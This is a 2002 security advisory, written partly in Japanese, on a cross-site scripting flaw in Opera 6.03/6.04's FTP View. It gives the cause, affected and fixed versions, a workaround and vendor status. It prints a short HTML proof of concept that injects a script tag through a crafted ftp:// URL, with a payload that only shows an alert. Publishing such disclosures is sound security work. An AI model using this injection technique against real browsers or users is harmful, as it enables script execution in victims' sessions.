Title:

Opera FTP View Cross-Site Scripting Vulnerability

Date:

4 August 2002 (Last modified: )

Author:

Eiji James Yoshida [ptrs-ejy@bp.iij4u.or.jp]
penetration technique research site [Advisories]

Risk:

Medium

Vulnerable:

Windows2000 SP2 Opera 6.03
Windows2000 SP2 Opera 6.04

Not vulnerable:

Opera 6.05

Bugtraq ID:

5401

Overview:

OperaブラウザのFTP View機能にはクロスサイト・スクリプティング脆弱性があります。

Details:

この脆弱性はOperaブラウザのFTP View機能に原因があります。
FTP View画面のタイトル部分である'<title>URL</title>'に表示するURLをサニタイジングしていないことが原因です。

Exploit code:

<html>
<head>
<META http-equiv="Refresh" content="5 ; url=ftp://%3c%2ftitle%3e%3cscript%3ealert(%22exploit%22)%3b%3c%2fscript%3e@[FTPserver]/">
</head>
<body>
<script>window.open("ftp://[FTPserver]/");</script>
</body>
</html>

Demonstration:

screen shot

Workaround:

JavaScriptを無効に設定してください。

Vendor status:

Opera Software ASAには2002年6月30日に報告しました。

Similar vulnerabilities:

インターネット エクスプローラの「FTPサイト用フォルダ ビュー」がスクリプトを実行する脆弱性

Mozilla FTP View Cross-Site Scripting Vulnerability

 Copyright(c) 2002 Eiji James Yoshida. All rights reserved